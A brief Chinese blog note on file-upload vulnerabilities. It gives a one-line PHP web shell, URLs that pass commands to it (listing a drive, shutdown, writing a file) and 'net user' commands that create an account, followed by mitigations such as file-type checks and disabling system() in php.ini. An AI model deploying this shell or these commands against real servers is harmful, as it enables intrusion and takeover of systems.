标签:
约束文件类型
实例:
上传txt
上传php文件 <?php phpinfo(); ?>
上传木马 <?php system($_get[‘cmd‘]);?>
www.xxxx.ma.php?cmd=dir d:\
www.xxxx.ma.php?cmd=shuntdown
新建用户
net user hello/add
net user hello/del
www.xxxx.ma.php?cmd=echo test>>d:\hi.txt
避免:
1.文件上传的过滤
a.通过文件后缀名 MP3 -> php 截包绕过
b.通过二进制来判断文件类型 通过文件头等判断
2.修改服务器核心参数,禁止脚本引擎允许命令
php_ini disable_functions = system
标签:
原文地址:http://www.cnblogs.com/yuleitest/p/5723867.html
